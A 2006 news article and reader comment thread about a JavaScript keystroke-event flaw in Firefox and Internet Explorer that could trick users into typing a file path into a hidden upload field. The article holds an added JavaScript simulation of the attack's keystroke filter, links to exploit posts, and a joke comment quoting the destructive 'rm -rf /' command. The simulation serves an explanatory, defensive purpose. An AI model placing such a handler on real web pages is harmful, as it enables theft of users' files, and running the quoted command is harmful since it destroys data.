JavaScript Flaw Affects Mozilla, IE
By Ed Oswald | Published June 9, 2006, 11:51 AM
Both Microsoft and Mozilla downplayed a JavaScript bug that security researchers say poses a risk of system compromise, saying it was difficult to exploit. The bug could allow a malicious Web site to obtain files from a visitor's computer, but exploiting it requires a good deal of user interaction.
For that reason, neither company will offer a separate patch for the issue; instead, both plan to address it in a future release of their browsers. Mozilla and Microsoft pointed to the amount of user interaction required and the lack of a code execution risk as reasons for holding off on a fix.
According to a Secunia advisory on the issue, the vulnerability lies in the handling of JavaScript keystroke events such as "OnKeyDown" and "OnKeyPress".
"The vulnerability is caused due to a design error where a script can cancel certain keystroke events when entering text," the advisory reads. "This can be exploited to trick a user into typing a filename in a file upload input field by changing focus and cancel the 'OnKeyPress' JavaScript event on certain characters."
From there, an arbitrary file from the user's system could be uploaded to a malicious Web site. However, the user must first type text that contains the characters of the file name, in order, on the attacker's page. To date, no exploitation of the flaw has been reported.
The vulnerability is known to exist on Firefox, Mozilla, Netscape, and Internet Explorer. Opera users appear to be safe from the problem, according to security researchers.
Secunia said those concerned should either disable JavaScript support, or refrain from entering suspicious text on untrusted Web sites.
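To make the mechanism in the advisory concrete, the following is an added example (not code from the article, Secunia, or either browser vendor) that models one arrangement matching its description: the off-screen file upload control holds keyboard focus, a script echoes every keystroke into a visible decoy text box so the page looks ordinary, and it cancels the keypress unless the typed character is the next one of the path the attacker wants. The two-control page model, the `simulate` / `canSteal` helpers, the constructed typing-test prompt and the `hardened` option (a file control that ignores typed characters and can only be set through the user's file picker, which is how the weakness can be closed) are all assumptions of this example, not details the article gives.

```javascript
"use strict";

// Minimal stand-in for two form controls and the browser's default keypress action.
// Constructed for this example; it is not a real DOM.
function makeControl(name, { isFile = false, acceptsTypedText = true } = {}) {
  return { name, isFile, acceptsTypedText, value: "" };
}

// Attacker-side script (hypothetical): the hidden file input has focus. Every keystroke is
// echoed into the visible decoy so the victim believes they are typing into a normal text
// box; the keypress is cancelled unless the character is the next one of targetPath, in
// which case the browser's default action is allowed to insert it into the file input.
function createKeystrokeFilter(targetPath, decoy) {
  let idx = 0;
  return function onKeyPress(ev) {
    decoy.value += ev.key;                         // what the victim sees
    if (idx < targetPath.length && ev.key === targetPath[idx]) {
      idx += 1;                                    // wanted: let it reach the file input
    } else {
      ev.preventDefault();                         // cancel: never reaches the file input
    }
  };
}

// Browser-side stand-in: dispatch one keypress per character to the focused control, then
// perform the default action unless the script cancelled it or the control refuses typed
// text (the hardened file control below).
function typeText(focused, text, onKeyPress) {
  for (const ch of text) {
    const ev = {
      key: ch,
      defaultPrevented: false,
      preventDefault() { this.defaultPrevented = true; },
    };
    onKeyPress(ev);
    if (!ev.defaultPrevented && (!focused.isFile || focused.acceptsTypedText)) {
      focused.value += ch;
    }
  }
}

// Run the whole trick. `hardened` models a file control whose value can only be set by the
// user's own file picker, never by typed characters (an assumption of this example).
function simulate(targetPath, typedText, { hardened = false } = {}) {
  const decoy = makeControl("comment");
  const fileField = makeControl("upload", { isFile: true, acceptsTypedText: !hardened });
  typeText(fileField, typedText, createKeystrokeFilter(targetPath, decoy));
  return {
    visible: decoy.value,               // the decoy shows exactly what was typed
    stolen: fileField.value,            // what ended up in the file input
    complete: fileField.value === targetPath,
  };
}

// Precondition check: the text the victim is asked to type must contain the target path
// as a subsequence, otherwise the file input ends up with a truncated, useless path.
function canSteal(targetPath, typedText) {
  return simulate(targetPath, typedText).complete;
}

// Demo with a constructed "typing test" prompt the victim is told to copy out.
const PROMPT = "type fast / enter the code / pass two rounds";
console.log(simulate("/etc/passwd", PROMPT));                     // complete: true
console.log(simulate("/etc/passwd", PROMPT, { hardened: true }));  // stolen: ""
console.log(canSteal("/etc/shadow", PROMPT));                     // false: no 'h' after the 's'
```

The check that matters for a page reviewer is the last line of `simulate`: the decoy always shows exactly what was typed, so the victim has nothing visible to notice, which is why a fix has to live in the browser (a file control that cannot be filled by keystrokes, or an upload confirmation) rather than in user vigilance.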
The exploit of this bug can be found here:
http://www.securityfocus...82/436876/30/0/threaded
http://foro.elhacker.net...?topic=126383.msg590990
Greetings!!
Score: 0
|lol, it appears that
"those concerned should either disable JavaScript support, or refrain from entering suspicious text on untrusted Web sites."
is the answer for any JavaScript bug that has yet to be fixed in a browser, though probably most of the people who would fall for most of these exploits would even know how to disable JavaScript.
Also, I hope they realise how extremely unlikely this is to ever be exploited. I mean, come on: if used on an input box (standard input box), generally you check your input after you have done inputting it (i.e. credit card number or details), so it's not likely you'll fail to notice it was modified; and if it's for a file upload, who is _not_ going to use the available "Browse..." button? The JavaScript would then have to activate to alter the value once the file had been chosen (in which case the onkeypress event wouldn't be being used; also, OnKeyPress would fail XML validation).
The chance of anyone actually using this exploit would be extremely small. I know I would not bother with a site where, when uploading a file, I had to manually input the file path.
Score: 0
|If there was an update to correct this, I'd make sure to get it within 8-12 years.
"Please insert filename for file with sensitive information (Ex: Credit card numbers)"
EditBox[C:\Documents and Settings\Admin\Local Settings\Application Data\Thunderbird\Profiles\ig7yv4h2.default\...]
Oh yes...big threat...dangerous.
Score: 0
|Good thing I use w3m instead. Whew....
Score: 0
|Why worry about these threats if you have taken proper precaution to avoid them altogether?
Kerio Personal Firewall
Avast Home Edition Virus Protection
Advanced Windows Care V2
All these products are free and stand guard. So all these Security Bulletins are quite useless.
Score: 0
|In other words, no user is stupid enough to type in a file name when prompted to do so, even if they have something as common as firewall software running? No wonder the *nix crowd laughs at this stuff!
Score: 0
|This is a pretty far stretch. Mozilla and Microsoft will be 'fixing this bug' in due time and are probably mutually thankful that neither company has given the impression that this is anything but a quirk that requires direct user interaction and stupidity to execute.
While I agree that safeguarding against technology that could potentially be harmful is important, I also understand that stopping a 'bug' in JavaScript could potentially break a huge number of websites on the Internet that use similar commands and similar methods.
Score: 0
|OK, I understand the point of view, that a security risk is very minimal given that it takes MUCH user interaction, but come on, how long would it take to simply fix the problem?
Secunia's job is to REPORT on problem areas. This is a problem, no matter HOW small. It seems to me that since Secunia went to all the trouble of finding the cause, the LEAST Mozilla and IE could do is simply implement a fix. How long would it take? Some say Microsoft takes a long time, which just isn't the case, but Mozilla, if they fixed it, it should only take 5 minutes, right?
So why don't they just simply fix it, and the problem goes away. What is the big deal? FIX IT ALREADY!!
Score: 0
|They are going to fix it, they're just not going to release a patch specifically for this. The chance of someone getting hit by this exploit is probably one in a billion.
If you're running a Mozilla browser and install the NoScript plugin, then your chance is zero. How's that for a fix?
Score: 0
|Because these guys receive hundreds of security reports a month, Microsoft likely thousands, and they must prioritize their resources where it counts.
Neither camp is ignoring this, but they are making sure that this and other security patches are tested in concurrence and that QA doesn't suffer as a result.
Score: 0
|For some--a great one. For those who actually need to use legitimate Javascript applets--it sucks. :\
Score: 0
|Javascript and Java applets are two completely different things. NoScript can block both depending on the settings you use (along with flash and pings), but it only takes a single click to white list a site and allow it to run like normal. Therefore NoScript is great for everyone. Get your facts straight before flaming something.
Score: 0
|you beat me to it. :(
Score: 0
|Five minutes to fix a bug, eh? I take it you're throwing QA right out the window?
Score: 0
|I don't think you understand what this involves. They'd either need to implement a keystroke/script analyzer("Anti-Virus style") or create policy settings for what keys sites can and cannot tap, and whether certain keys should be detectable but be passed through anyway.
I'd choose the second one("Opera style"), but another option is to add an upload confirmation box.
Score: 0
|If you have programmed some large projects, you know there are MANY flaws in a system, big and small. And it is logical that there is a priority on fixing the issues. I believe the developers would rather fix the more urgent issues instead of spending their time on this rather-difficult-to-exploit flaw.
On Firefox, it is quite easy for users to fix the problem themselves. Simply install the famous "NoScript" extension and scripts can be enabled only on trusted sites. Simple.
But why is Opera not vulnerable? We'd better ask the Opera developers.
Score: 0
|Why is Opera not vulnerable? Simply because Opera is the only desktop browser that takes security seriously.
Unfortunately, the downside of this is that functionality/compatibility is sometimes hampered.
Score: 0
|LOL, 5 minutes to fix....
You really have no idea what's involved with producing software do you..
Score: 0
|Now if only they took ad and popup blocking as seriously. :P
Score: 0
|My AdBlocking and popup blocker works really well, better than the last time I looked at Firefox's extension.
Have you looked at the adblocker in Opera 9? I can block graphical and flash ads without any trouble. (I can't do text ads, but I think the FF adblocker has the same issue).
As for popups, would like to hear what the Firefox blocker does that the Opera one does not... Again, I think the opera 9 popup blocker does everything I need it to.
Score: 0
|Now I would like to hear how did you set up your adblocker in Opera? Which ini file do you need to modify? Need to build your own block list?
Score: 0
|I admit Opera has a good track record on security. What I don't like about Opera is its functionality. They are implementing something similar in Opera 9 that already exists in Fx, but Opera 9 is still kind of weekly builds.
Score: 0
|??? Right click on a page, "Block Content", then block the adverts I don't want. I can then optionally change some of the server names to block all the ad servers from a particular ad farm in Tools, Advanced, Content, Blocked Content.
Seems like you're reviewing Opera 6!!!!
Score: 0
|Secunia can't be serious. I know they have been reaching for it more and more lately, but come on, this is ridiculous (sp?).
Score: 0
|This just in:
Secunia has discovered a flaw in Unix/Linux that could cause all of your files to be deleted. This can be triggered by running the command 'rm -rf /' with root privileges. Secunia has given this flaw a critical warning because it can render a system useless. Linus Torvalds has responded by telling the people at Secunia to go screw themselves until they can actually find a legitimate flaw, or a girlfriend, whichever comes first.
Score: 0